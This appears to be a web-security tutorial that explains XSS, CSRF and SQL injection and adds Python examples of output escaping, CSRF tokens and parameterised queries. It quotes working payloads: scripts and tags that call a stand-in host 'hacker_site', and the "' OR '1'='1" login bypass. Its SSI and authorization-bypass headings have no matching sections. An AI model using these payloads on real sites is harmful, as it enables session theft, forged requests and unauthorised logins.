WEB
- XSS (Cross-Site Scripting)
- XSRF / CSRF (Request Forgery)
- Code injections (SQL, PHP, ASP ..)
- Server-Side Includes (SSI) Injection
- Authorization Bypass
XSS (Cross-Site Scripting)
XSS payload examples:
<script>alert(document.cookie);</script>
<script>window.parent.location.href='http://hacker_site';</script>
<object type="text/x-scriptlet" data="http://hacker_site"></object>
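The three payloads above only execute because the application copies a request parameter into the page unchanged. The following Python snippet is an added illustration, not code from the original page: it renders the same reflected parameter once without encoding and once through html.escape, and checks which rendering still carries an injected element. The page layout, the parameter name q and the sample inputs are constructed for the example.

```python
import html

# Constructed sample inputs: a benign search term plus the three payloads
# quoted on the page.
SAMPLE_INPUTS = [
    "laptop",
    "<script>alert(document.cookie);</script>",
    "<script>window.parent.location.href='http://hacker_site';</script>",
    '<object type="text/x-scriptlet" data="http://hacker_site"></object>',
]


def render_vulnerable(term):
    """Reflects the request parameter straight into the page, in both a
    text context and an attribute context; the browser parses whatever
    tags the input contains."""
    return ('<p>Results for: ' + term + '</p>'
            '<input name="q" value="' + term + '">')


def render_escaped(term):
    """Same page with output encoding. quote=True also encodes ' and ",
    which is what keeps the attribute value from being closed early."""
    safe = html.escape(term, quote=True)
    return ('<p>Results for: ' + safe + '</p>'
            '<input name="q" value="' + safe + '">')


def has_injected_element(page):
    """Crude check, used only to make the difference visible: does the
    rendered page contain an element the application never emits itself?"""
    lowered = page.lower()
    return any(tag in lowered for tag in ("<script", "<object", "<img"))


def compare(inputs=SAMPLE_INPUTS):
    """For each input, (vulnerable rendering leaks a tag, escaped one does)."""
    return [(has_injected_element(render_vulnerable(t)),
             has_injected_element(render_escaped(t))) for t in inputs]


if __name__ == "__main__":
    for term, flags in zip(SAMPLE_INPUTS, compare()):
        print(flags, repr(term))
```

html.escape is the right tool for HTML text and quoted attribute values; a parameter that ends up inside a script block, a URL or a CSS property needs the encoding rule of that context instead, so the escaping must follow where in the page the value is placed.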
XSRF / CSRF (Request Forgery)
CSRF via an HTML <IMG> tag, a SCRIPT tag, or a Javascript Image object. Examples:
IMG SRC
<img src="http://hacker_site/?command">
SCRIPT SRC
<script src="http://hacker_site/?command"></script>
Javascript Image
<script>
var foo = new Image();
foo.src = "http://hacker_site/?command";
</script>
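All three forms above send the victim's cookies but nothing else the attacker cannot control, which is what a server-side check can exploit. The snippet below is an added example, not part of the original page: it derives a per-session token with an HMAC, requires state-changing actions to arrive as POST with that token, and refuses a cross-site Origin. The request dictionaries, the session id, the SECRET value and the site origin example-app.test are constructed placeholders.

```python
import hashlib
import hmac

# Constructed placeholder; a real deployment keeps this out of source code.
SECRET = b"server-side-secret-placeholder"
SITE_ORIGIN = "https://example-app.test"


def issue_token(session_id):
    """Token bound to the session; the server recomputes it instead of
    storing it, so it can be embedded in forms for that session only."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_valid_request(request, session_id, site_origin=SITE_ORIGIN):
    """request is a dict with 'method', 'headers' and 'form'.
    A browser loading <img src> or <script src> issues a GET with cookies
    only; an auto-submitted cross-site form carries the attacker's Origin
    and no token. Both are rejected here."""
    if request["method"] not in ("POST", "PUT", "DELETE"):
        return False  # state changes must not be reachable via GET
    origin = request["headers"].get("Origin")
    if origin is not None and origin != site_origin:
        return False
    supplied = request["form"].get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(supplied, issue_token(session_id))


def demo(session_id="sess-123"):
    """Constructed requests: one legitimate form post and two forgeries."""
    legitimate = {"method": "POST",
                  "headers": {"Origin": SITE_ORIGIN},
                  "form": {"csrf_token": issue_token(session_id)}}
    forged_img_get = {"method": "GET", "headers": {}, "form": {}}
    forged_post = {"method": "POST",
                   "headers": {"Origin": "http://hacker_site"},
                   "form": {}}
    return {
        "legitimate": is_valid_request(legitimate, session_id),
        "forged_img_get": is_valid_request(forged_img_get, session_id),
        "forged_post": is_valid_request(forged_post, session_id),
    }


if __name__ == "__main__":
    print(demo())
```

The token check is the primary control; the Origin comparison and the refusal of GET for state changes are there so that a forged request is stopped even when the token is leaked or omitted by a bug elsewhere.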
Code injections (SQL, PHP, ASP ..)
Example: SQL. The login query:
SELECT Username
FROM Users
WHERE Name = 'tester'
AND Password = 'testpass';
With Name = tester and the following entered as the password:
testpass' OR '1'='1'
the resulting SQL query is:
SELECT Username
FROM Users
WHERE Name = 'tester'
AND Password = 'testpass' OR '1'='1';
'1'='1' is always true, so the SQL condition is satisfied regardless of the password.
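To see the effect end to end, here is an added Python example (not code from the original page) that runs the page's query against a constructed in-memory SQLite table, once built by string concatenation as above and once with bound parameters. The Users rows and their passwords are constructed sample data.

```python
import sqlite3

# Constructed sample table matching the columns used in the page's query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Name TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('tester', 'tester', 'testpass')")
    conn.execute("INSERT INTO Users VALUES ('admin', 'admin', 'placeholder-pw')")
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query exactly as the page shows it, by concatenation.
    The quote in the password closes the literal and the rest is parsed
    as SQL, so the OR '1'='1' clause matches every row."""
    sql = ("SELECT Username FROM Users WHERE Name = '" + name +
           "' AND Password = '" + password + "';")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    """Same query with bound parameters: the driver passes the password as
    a value, so quotes in it are never interpreted as SQL syntax."""
    sql = "SELECT Username FROM Users WHERE Name = ? AND Password = ?;"
    return [row[0] for row in conn.execute(sql, (name, password))]


# The exact payload quoted on the page.
PAYLOAD = "testpass' OR '1'='1"


def demo():
    """Runs both variants with the real password and with the payload."""
    conn = make_db()
    return {
        "vuln_normal": login_vulnerable(conn, "tester", "testpass"),
        "vuln_injected": login_vulnerable(conn, "tester", PAYLOAD),
        "safe_normal": login_safe(conn, "tester", "testpass"),
        "safe_injected": login_safe(conn, "tester", PAYLOAD),
    }


if __name__ == "__main__":
    for case, usernames in demo().items():
        print(f"{case}: {usernames}")
```

Because AND binds tighter than OR, the injected query reads as (Name = 'tester' AND Password = 'testpass') OR '1'='1', which is why the vulnerable variant returns every Username in the table, while the parameterised variant returns nothing for the same input.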